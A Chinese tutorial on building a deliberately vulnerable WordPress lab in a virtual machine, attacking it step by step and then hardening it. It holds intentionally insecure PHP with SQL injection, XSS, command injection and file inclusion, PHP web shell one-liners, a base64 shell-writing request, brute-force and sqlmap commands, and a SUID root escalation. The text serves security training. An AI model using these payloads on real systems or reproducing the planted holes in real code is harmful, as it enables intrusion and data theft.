从零构建WordPress渗透测试靶场：实战演练与安全加固

1. 项目概述：为什么需要一个专属的WordPress渗透测试靶场？

在安全领域，无论是刚入门的新手，还是想深化Web应用安全技能的从业者，理论学习之后，最迫切的需求就是一块能“合法开火”的场地。这就是靶场的价值。市面上虽然有DVWA、Pikachu、SQLi-Labs等优秀的通用靶场，但它们大多是针对特定漏洞类型设计的标准化环境。当你面对的是一个像WordPress这样由核心程序、海量主题和插件构成的复杂生态系统时，通用靶场的局限性就显现出来了。

WordPress驱动着全球超过40%的网站，其巨大的市场占有率使其成为攻击者的首要目标，也自然成为安全人员必须精通的“战场”。一个真实的WordPress环境，其攻击面远不止于SQL注入或XSS。它涉及权限提升、插件/主题漏洞利用、配置文件泄露、用户枚举、XML-RPC滥用、以及版本指纹识别与已知漏洞利用等一连串的、关联性极强的攻击链。在Pikachu靶场里练会了一个盲注，不代表你能在一个开启了缓存、使用了非标准表前缀、并且安装了安全插件的WordPress里找到注入点并成功利用。

因此，从零构建一个WordPress渗透测试靶场，其核心目的不是简单地安装一个WordPress，而是亲手搭建一个高度可控、可反复破坏与恢复、并且能模拟真实世界复杂性的实验环境。这个过程本身，就是一次绝佳的学习。你需要理解LAMP/LEMP栈的配置、数据库的初始化、文件权限的设置、以及WordPress自身的安装选项——这些恰恰是安全评估中信息收集阶段的关键。你知道wp-config.php文件默认在哪吗？你知道如何通过错误信息判断数据库配置吗？这些知识，在“一键安装”的靶场里是学不到的。

这个靶场将服务于两类主要人群：一是希望从基础开始系统学习Web渗透测试，并以WordPress为具体案例的安全爱好者；二是已经有一定基础，希望深入研究CMS安全、练习完整渗透测试流程的工程师。通过这个项目，你不仅能掌握漏洞利用的技巧，更能深刻理解漏洞是如何被“引入”到一个系统中的——从错误配置、到脆弱的第三方代码、再到不安全的运维习惯。这才是“防御视角下的攻击演练”的精髓。

2. 靶场整体设计与核心思路拆解

构建靶场，首要原则是隔离与可控。我们绝不能在公网服务器甚至本地生产环境中直接进行渗透测试。因此，虚拟化技术是我们的基石。整个靶场的架构设计遵循从底层基础设施到上层应用漏洞的植入逻辑。

2.1 技术栈选型与环境隔离方案

我选择VirtualBox + Vagrant作为基础平台。相比VMware，VirtualBox免费且跨平台；Vagrant则能通过代码（Vagrantfile）定义虚拟机配置，实现环境的版本化和一键创建/销毁，完美符合靶场“可反复折腾”的需求。当然，你也可以使用VMware Workstation配合其Vagrant插件，或者直接用Docker。但考虑到要模拟完整的操作系统环境（用于练习提权等）和更传统的部署方式，虚拟机方案更为贴切。

靶机操作系统我选用Ubuntu Server 22.04 LTS。它长期支持，社区资源丰富，也是很多云服务器的默认选择，模拟真实环境。在虚拟机内部，我们部署经典的LAMP栈（Linux, Apache, MySQL, PHP）。为什么不选Nginx？Apache在共享主机和历史遗留系统中更常见，且其.htaccess文件是Web安全中的一个重要知识点。我们会故意留下一些不安全的Apache配置，作为漏洞点。

核心思路是：先构建一个“干净”但存在基础配置缺陷的WordPress，然后分阶段、有目的地引入漏洞。我们不会使用集成了漏洞的现成WordPress镜像（如WPScan的测试环境），因为那样你只看到了漏洞的“果”，而不知其“因”。我们的构建过程本身，就是漏洞的创造过程。

2.2 漏洞体系规划：从配置错误到代码缺陷

一个有效的靶场应该覆盖OWASP Top 10等核心漏洞类型，并结合WordPress特性进行定制。我们的漏洞规划分为三个层次：

1. 系统与配置层漏洞：这是最容易忽视但往往危害极大的入口。包括：

   • 弱口令：为管理员账户设置诸如admin/admin的密码。
   • 敏感信息泄露：允许访问/wp-admin/install.php以重装站点；开启Apache目录列表功能，暴露插件目录；保留readme.html、license.txt等版本标识文件。
   • 错误配置：将WP_DEBUG设置为true，导致调试信息泄露；使用默认的数据库表前缀wp_；将FS_METHOD设置为direct，为后续文件上传利用创造条件。
   • 不必要的服务：开启XML-RPC接口（默认开启），用于爆破和SSRF攻击练习。

2. 核心与插件/主题漏洞层：这是WordPress特有的攻击面。

   • 故意安装存在已知漏洞的旧版本插件和主题。例如，安装一个老版本的Revolution Slider插件（历史上存在严重的RCE漏洞）或MailPoet插件（存在任意文件上传漏洞）。我们会从WordPress官方插件库的历史版本中下载。
   • 使用存在问题的主题：找一个包含本地文件包含（LFI）漏洞或未授权设置选项功能的旧主题。
   • 用户枚举：通过/?author=1这样的请求，暴露用户名。

3. 通用Web应用漏洞层：在自定义功能中植入漏洞。

   • 我们会在靶场中额外创建一个简单的自定义PHP页面（例如/vulnerable.php），在其中故意编写存在SQL注入（未过滤的$_GET[‘id’]）、反射型XSS（未过滤的$_GET[‘name’]回显）、命令注入（通过$_GET[‘cmd’]调用system()函数）的代码。这用于练习最基础的漏洞发现与利用。

这种分层设计确保了从信息收集、到漏洞扫描、再到武器化利用和权限提升的完整链条都能得到练习。靶场既是漏洞的集合，也是一个完整的、有逻辑的渗透测试故事线。

3. 分步构建靶场：从虚拟机到漏洞植入

接下来，我们进入实操环节。请确保你的宿主机（物理机）已安装好VirtualBox和Vagrant。

3.1 第一步：使用Vagrant初始化虚拟机

首先，创建一个项目目录，例如wordpress-pentest-range，并在其中初始化Vagrant。

mkdir wordpress-pentest-range && cd wordpress-pentest-range vagrant init ubuntu/jammy64 # jammy是Ubuntu 22.04的代号

这会生成一个Vagrantfile。我们需要编辑它，配置虚拟机资源并设置网络，以便宿主机可以访问。

Vagrant.configure("2") do |config| config.vm.box = "ubuntu/jammy64" config.vm.hostname = "wp-pentest-target" # 分配更多资源以流畅运行 config.vm.provider "virtualbox" do |vb| vb.memory = "2048" # 2GB内存 vb.cpus = 2 end # 设置私有网络，宿主可通过IP访问靶机 config.vm.network "private_network", ip: "192.168.56.10" # 如果你希望使用桥接网络模拟公网环境，可以取消下一行注释，但请注意安全。 # config.vm.network "public_network" end

保存后，启动虚拟机。这个过程会下载Ubuntu镜像（如果本地没有）并启动。

vagrant up

启动后，你可以通过vagrant ssh登录到虚拟机内部。后续的所有操作，除非特别说明，都是在虚拟机内执行。

3.2 第二步：在虚拟机内部署LAMP环境与WordPress

登录后，首先更新系统并安装必要的软件包。

sudo apt update && sudo apt upgrade -y sudo apt install -y apache2 mysql-server php libapache2-mod-php php-mysql php-curl php-gd php-mbstring php-xml php-xmlrpc php-zip

安装过程中，MySQL会提示你设置root密码。这里我们故意设置一个弱密码，比如root。在实际生产环境中这是大忌，但靶场里我们需要这个“漏洞点”。

接下来，配置MySQL并为WordPress创建数据库和用户。

sudo mysql -u root -p # 输入密码 root

在MySQL shell中执行：

CREATE DATABASE wordpress DEFAULT CHARACTER SET utf8 COLLATE utf8_unicode_ci; CREATE USER 'wpuser'@'localhost' IDENTIFIED BY 'wppassword'; -- 使用弱密码 GRANT ALL PRIVILEGES ON wordpress.* TO 'wpuser'@'localhost'; FLUSH PRIVILEGES; EXIT;

现在，下载并安装WordPress。我们故意下载一个不是最新版的旧版本，以引入一些已知的版本漏洞特征。你可以从WordPress发布存档中下载特定版本。

cd /tmp wget https://wordpress.org/wordpress-5.8.3.tar.gz # 示例，选择一个旧版本 tar -xzvf wordpress-5.8.3.tar.gz sudo cp -r wordpress/* /var/www/html/ sudo chown -R www-data:www-data /var/www/html/ sudo chmod -R 755 /var/www/html/

3.3 第三步：进行“不安全”的WordPress安装与配置

在宿主机浏览器中访问http://192.168.56.10，你应该能看到WordPress的安装页面。按照向导进行安装。

• 站点标题：随意，如“渗透测试靶场”。
• 用户名：输入admin。这是最常见的默认管理员用户名，是暴力破解的首要目标。
• 密码：输入一个弱密码，例如admin123或password。系统可能会警告，但强制使用。
• 确认密码：相同弱密码。
• 电子邮箱：填写一个虚拟邮箱，如admin@target.local。

点击安装。安装完成后，以admin身份登录后台 (http://192.168.56.10/wp-admin)。

现在，我们需要进行一系列**“不安全”的配置**，这是构建靶场的核心操作：

1. 修改wp-config.php以开启调试和降低安全设置：

   sudo nano /var/www/html/wp-config.php

   找到define( ‘WP_DEBUG’, false );这一行，将其改为：

   define( ‘WP_DEBUG’, true ); // 开启调试，泄露信息 define( ‘WP_DEBUG_LOG’, true ); // 将错误日志写入文件 define( ‘WP_DEBUG_DISPLAY’, true ); // 在页面上显示错误

   找到$table_prefix = ‘wp_’;，保持默认的wp_不变。使用默认前缀会让SQL注入攻击中的表名猜测更容易。 在文件末尾添加：

   define( ‘FS_METHOD’, ‘direct’ ); // 允许直接文件系统操作，可能用于文件上传利用

2. 配置Apache以泄露信息：

   sudo nano /etc/apache2/apache2.conf

   找到<Directory /var/www/>部分，确保Options Indexes FollowSymLinks中的Indexes存在。这允许在无index文件时列出目录内容。

   sudo systemctl restart apache2

   现在访问http://192.168.56.10/wp-content/plugins/，你可能会看到目录列表（如果插件目录为空或存在索引文件则不会，我们后续会利用这一点）。

3.4 第四步：植入有漏洞的插件与主题

这是模拟真实攻击中最常见的入口。我们需要寻找那些历史上存在严重漏洞且旧版本容易获取的插件。

以“Email Subscribers & Newsletters” (以前叫 Icegram Email Subscribers & Newsletters)插件为例，其某个旧版本存在认证后SQL注入漏洞。我们手动安装一个旧版本。

1. 在宿主机上，从第三方存档网站（如wordpress.org的插件SVN仓库）下载旧版本插件ZIP包。注意：务必在隔离的虚拟环境中进行，切勿在生产环境下载或安装未知来源插件。
2. 通过WordPress后台上传安装，或者直接将解压后的插件文件夹（例如email-subscribers）上传到虚拟机的/var/www/html/wp-content/plugins/目录。
3. 在WordPress后台激活该插件。

用类似的方法，安装一个存在问题的旧主题。例如，一些免费主题可能包含theme-options.php文件，该文件允许通过url参数进行本地文件包含（LFI）。你可以从主题市场下载一个旧版本主题，或者自己简单创建一个有漏洞的主题文件夹。

创建一个名为vulnerable-theme的目录，里面至少包含style.css（定义主题信息）和一个index.php。在index.php中，可以故意加入不安全的代码：

// 模拟存在LFI漏洞的旧主题功能 if (isset($_GET[‘file’])) { include($_GET[‘file’]); // 危险！未经过滤的直接包含 }

将这个主题文件夹放到/var/www/html/wp-content/themes/下，并在后台启用它。

3.5 第五步：创建包含通用漏洞的自定义页面

为了练习基础的漏洞利用，我们在Web根目录创建一个独立的漏洞测试页面。

sudo nano /var/www/html/vuln.php

内容如下：

<?php // vuln.php - 一个集成了多种漏洞的测试页面 error_reporting(0); $conn = new mysqli(“localhost”, “wpuser”, “wppassword”, “wordpress”); // 1. SQL注入漏洞 if (isset($_GET[‘id’])) { $id = $_GET[‘id’]; // 未过滤 $sql = “SELECT * FROM wp_posts WHERE ID = $id”; // 拼接，存在数字型注入 $result = $conn->query($sql); if ($result->num_rows > 0) { while($row = $result->fetch_assoc()) { echo “Post Title: “ . $row[“post_title”]. “<br>”; } } } // 2. 反射型XSS漏洞 if (isset($_GET[‘name’])) { echo “Hello, “ . $_GET[‘name’]. “!”; // 直接回显，未转义 } // 3. 命令注入漏洞 if (isset($_GET[‘cmd’]) && is_admin()) { // 假设is_admin()是检查权限的函数，这里我们故意不设防 system($_GET[‘cmd’]); // 危险！ } // 一个简单的“管理员检查”函数（永远返回true，模拟权限绕过思考） function is_admin() { // 真实场景应检查会话或cookie，这里为靶场简化 return true; // 这本身也是一个逻辑漏洞！ } ?> <h3>漏洞测试页面</h3> <ul> <li><a href=“?id=1”>测试SQL注入 (ID=1)</a></li> <li><a href=“?name=<script>alert(‘xss’)</script>”>测试XSS</a></li> <li>命令注入：?cmd=whoami</li> </ul>

这个页面集成了三种常见漏洞，并且有一个永远返回true的is_admin()函数，这引导测试者去思考如何绕过真正的权限验证（例如，寻找认证漏洞或会话管理问题）。

4. 实战演练：针对自建靶场的渗透测试流程

现在，我们的靶场已经准备就绪。让我们切换到攻击者视角，使用Kali Linux（或任何渗透测试发行版）作为攻击机，对靶场192.168.56.10进行一场完整的渗透测试演练。假设攻击机IP为192.168.56.11。

4.1 第一阶段：信息收集与侦察

信息收集是渗透测试的基石，决定了后续攻击的方向和效率。

1. 服务与端口扫描：

   # 使用nmap进行快速扫描 nmap -sV -sC -O 192.168.56.10

   结果会显示80端口开放（Apache httpd），可能还有22端口（SSH）。-sC脚本扫描可能会识别出WordPress。

2. Web应用指纹识别：

   # 使用Wappalyzer浏览器插件或whatweb命令行工具 whatweb http://192.168.56.10

   输出会明确显示“WordPress”，以及PHP版本、Apache版本等信息。

3. WordPress特定枚举：

   • 用户枚举：访问http://192.168.56.10/?author=1。如果重定向到类似.../author/admin/的URL，则用户名admin被暴露。
   • 目录与文件发现：使用gobuster或dirb进行目录爆破。

     gobuster dir -u http://192.168.56.10 -w /usr/share/wordlists/dirb/common.txt

     你会发现/wp-admin/,/wp-content/,/wp-includes/,/readme.html,/license.txt,/wp-config.php（如果配置不当可能直接访问）等。访问/readme.html可以确认WordPress的精确版本（我们安装的5.8.3）。
   • 插件/主题枚举：访问/wp-content/plugins/和/wp-content/themes/。如果之前配置了目录列表，你可能会直接看到插件和主题文件夹列表。即使没有，也可以通过猜测或使用wpscan进行枚举。

4.2 第二阶段：漏洞扫描与验证

在信息收集的基础上，使用自动化工具和手动测试结合来发现漏洞。

1. 使用WPScan进行自动化扫描： WPScan是WordPress安全审计的瑞士军刀。首先更新其数据库。

   wpscan --update

   然后对目标进行扫描：

   wpscan --url http://192.168.56.10 --enumerate vp,vt,u --plugins-detection aggressive

   • --enumerate vp,vt,u：枚举有漏洞的插件(vp)、有漏洞的主题(vt)和用户(u)。
   • 扫描结果会列出：
     • 发现的用户（如admin）。
     • 检测到的插件及其版本（如email-subscribers的旧版本）。
     • 关联的已知漏洞（CVE编号、类型、参考链接）。
     • 可能会提示XML-RPC接口可用。

2. 手动验证与利用：

   • 弱口令爆破：针对admin用户，使用hydra或wpscan的密码爆破功能。

     wpscan --url http://192.168.56.10 -U admin -P /usr/share/wordlists/rockyou.txt

     由于我们设置了弱密码admin123，这个攻击有很大概率成功。
   • 插件漏洞利用：根据WPScan提示，假设email-subscribers插件存在SQL注入漏洞。你需要查找该漏洞的公开Exp或自行编写。例如，漏洞可能存在于/wp-content/plugins/email-subscribers/admin/partials/下的某个文件，参数未过滤。使用sqlmap进行验证：

     sqlmap -u “http://192.168.56.10/wp-content/plugins/email-subscribers/admin/partials/some-file.php?some_id=1" --risk=3 --level=5

   • 通用漏洞测试：访问我们创建的/vuln.php页面。
     • 测试SQL注入：/vuln.php?id=1 union select 1,user(),3,4,5。
     • 测试XSS：/vuln.php?name=<script>alert(document.cookie)</script>。
     • 测试命令注入：/vuln.php?cmd=id（需要“管理员权限”，但我们的is_admin()返回true，所以直接执行）。成功后会返回uid=33(www-data) gid=33(www-data) groups=33(www-data)。

4.3 第三阶段：获取Shell与权限提升

一旦找到有效的利用点，下一步就是获取一个交互式的Shell。

1. 通过文件上传获取Web Shell：

   • 如果你通过爆破或漏洞获得了admin后台权限，这是最直接的路径。WordPress后台允许安装插件和主题。你可以将一句话PHP木马（例如<?php system($_GET[‘c’]); ?>）嵌入到一个合法的插件ZIP包中，然后通过后台上传安装。安装后，访问该恶意文件即可执行命令。
   • 更隐蔽的方法是，利用媒体上传功能。将一句话木马写入一个图片的EXIF信息中（需要服务器支持php_exif模块），或者直接上传一个.php后缀的文件（如果服务器未正确过滤）。我们之前在wp-config.php中设置了FS_METHOD为direct，这有时会降低上传限制。

2. 通过命令注入写入Web Shell： 如果我们通过vuln.php的命令注入获得了命令执行能力，可以直接写入一个Web Shell。

   # 在攻击机上，将一句话木马编码，然后通过curl发送命令注入请求 echo ‘<?php eval($_POST[“cmd”]);?>‘ | base64 # 输出：PD9waHAgZXZhbCgkX1BPU1RbImNtZCJdKTs/Pgo=

   然后通过靶场的命令注入点执行：

   http://192.168.56.10/vuln.php?cmd=echo+PD9waHAgZXZhbCgkX1BPU1RbImNtZCJdKTs/Pgo=+|+base64+-d+>+/var/www/html/shell.php

   访问http://192.168.56.10/shell.php，使用中国菜刀或蚁剑等工具连接，密码为cmd。

3. 权限提升（提权）： 获取的Web Shell通常以www-data用户权限运行。我们需要提升到root。

   • 内核漏洞提权：在虚拟机内，使用uname -a查看内核版本。搜索该版本是否存在公开的本地提权漏洞（如DirtyPipe、DirtyCow等）。使用searchsploit查找。

     searchsploit Ubuntu 22.04 kernel

     找到Exp后，上传到靶机，编译并执行。
   • SUID/GUID文件滥用：查找具有SUID位的文件。

     find / -perm -u=s -type f 2>/dev/null

     查看是否有find,vim,bash,nmap等命令具有SUID位。例如，如果find有SUID，可以提权：/usr/bin/find . -exec /bin/sh -p \; -quit。
   • 数据库提权：如果我们有数据库的弱口令（root/root），可以尝试通过MySQL的UDF函数或写入计划任务来提权。但本例中MySQL的root用户只能本地登录，需要先获得一个系统shell。

5. 常见问题、排查技巧与防御思考

在构建和测试过程中，你一定会遇到各种问题。这里记录一些典型的坑和解决思路。

5.1 靶场搭建常见问题

• Vagrant up 启动缓慢或失败：

  • 问题：卡在Downloading box或Waiting for VM to boot。
  • 排查：检查网络，确保能访问Vagrant云。可以尝试先手动下载box文件并添加。失败也可能是VirtualBox版本与Vagrant不兼容，或主机未开启虚拟化（VT-x/AMD-V）。
  • 解决：使用国内镜像源下载box，或升级VirtualBox和Vagrant到最新稳定版。

• WordPress安装时数据库连接错误：

  • 问题：提示“建立数据库连接时出错”。
  • 排查：检查MySQL服务是否运行 (sudo systemctl status mysql)。检查wp-config.php中的数据库名、用户名、密码和主机（localhost）是否正确。检查MySQL用户wpuser是否拥有对wordpress数据库的权限。
  • 解决：重新授权用户：GRANT ALL ON wordpress.* TO ‘wpuser’@‘localhost’; FLUSH PRIVILEGES;。确保/var/www/html/目录及其内容的所有者是www-data。

• Apache显示目录列表失败：

  • 问题：即使配置了Options Indexes，访问目录仍显示“403 Forbidden”或跳转到索引页。
  • 排查：检查目录下是否有.htaccess文件覆盖了配置，或者父目录的配置禁止了Indexes。检查目录权限是否允许Apache进程读取。
  • 解决：使用sudo apache2ctl -S查看配置继承关系。确保目标目录的<Directory>段中明确允许Indexes。使用sudo chmod 755 /var/www/html/wp-content/plugins确保可读。

5.2 渗透测试演练中的技巧与避坑指南

• WPScan扫描无结果或速度慢：

  • 技巧：使用--random-user-agent绕过简单的UA拦截。使用--throttle参数降低请求速度，避免被临时屏蔽。如果目标有缓存插件，扫描可能漏报，可以尝试在URL后添加随机参数如?nocache=1。
  • 避坑：不要一上来就使用--enumerate all进行全量枚举，这非常耗时且容易被封。应先进行基本扫描(—enumerate vp,vt,u)，根据结果再决定深入方向。

• SQL注入利用失败：

  • 技巧：使用sqlmap的—tamper参数尝试各种绕过脚本（如space2comment,equaltolike）。如果目标是数字型注入，sqlmap的—technique参数指定B（布尔盲注）或T（时间盲注）可能更有效。
  • 避坑：注意WordPress的数据库表前缀。默认是wp_，但可能被修改。在注入时需要相应调整表名。可以通过/wp-config.php泄露或基于错误的SQL语句来猜测前缀。

• 获取的Web Shell无法执行命令：

  • 排查：检查PHP的disable_functions配置，可能禁用了system,exec,shell_exec等函数。使用phpinfo()页面查看。
  • 绕过：尝试其他未禁用的函数，如passthru(),proc_open(),popen()，或使用反引号`command`。如果全部禁用，可以考虑使用PHP文件操作函数写入一个更复杂的木马，或者利用数据库、日志文件等间接执行命令。

5.3 从攻击到防御：安全加固建议

通过亲手构建漏洞并利用它们，你应该对如何防御有了更直观的认识。以下是对这个自建靶场的加固措施，也正是真实WordPress站点应该做的：

1. 强化认证：

   • 禁用默认admin用户名：创建新的管理员账户，使用复杂、唯一的用户名，然后删除admin账户。
   • 使用强密码：强制所有用户使用长密码（12位以上，混合大小写字母、数字、符号）。
   • 启用双因素认证（2FA）：使用插件如Wordfence或Google Authenticator增加登录门槛。
   • 限制登录尝试：安装Limit Login Attempts Reloaded等插件，防止暴力破解。

2. 最小化信息泄露：

   • 关闭调试模式：在生产环境中，确保wp-config.php中WP_DEBUG设置为false。
   • 移除版本信息：删除readme.html、license.txt，并通过函数过滤移除页面头部和Feed中的生成器标签。
   • 禁用目录列表：在Apache配置或.htaccess中确保Options -Indexes。
   • 保护wp-config.php：通过.htaccess限制访问：<Files wp-config.php> order allow,deny deny from all </Files>。

3. 安全配置：

   • 修改数据库表前缀：在安装时使用随机前缀，如wp_9a8b7c6d5e_。
   • 安全设置FS_METHOD：使用ssh2或ftpext，避免使用direct。
   • 禁用XML-RPC：如果不需要远程发布功能，通过插件或.htaccess禁用XML-RPC。
   • 及时更新：始终保持WordPress核心、插件和主题更新到最新版本。

4. 文件与权限：

   • 遵循最小权限原则：wp-content目录可写，但wp-includes和wp-admin目录应只读。具体的文件权限设置（如755、644）需根据托管环境调整。
   • 安装安全插件：使用Wordfence Security或Sucuri Security等插件，提供防火墙、恶意软件扫描和文件完整性监控。

5. 网络与服务器层面：

   • 使用Web应用防火墙（WAF）：如Cloudflare、ModSecurity等。
   • 定期备份：确保有完整的、可恢复的网站和数据库备份。
   • 使用HTTPS：通过Let‘s Encrypt等免费证书强制全站HTTPS，防止中间人攻击和窃听。

构建并渗透测试自己的WordPress靶场，是一个“破坏”与“建设”循环上升的过程。每一次成功的攻击，都应该立刻转化为一条坚定的防御规则。这个靶场不是一次性的，你可以随时通过vagrant destroy和vagrant up重置它，尝试不同的漏洞组合、不同的攻击路径，或者练习在已加固的环境中进行更高级的测试。真正的安全能力，就诞生于这种不断的“攻”与“防”的实战演练中。